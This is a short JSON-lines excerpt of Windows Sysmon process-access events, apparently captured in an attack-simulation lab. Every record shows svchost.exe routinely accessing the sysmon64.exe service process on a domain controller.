{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3091,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3092,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3093,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3094,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3095,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3096,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3097,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3098,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
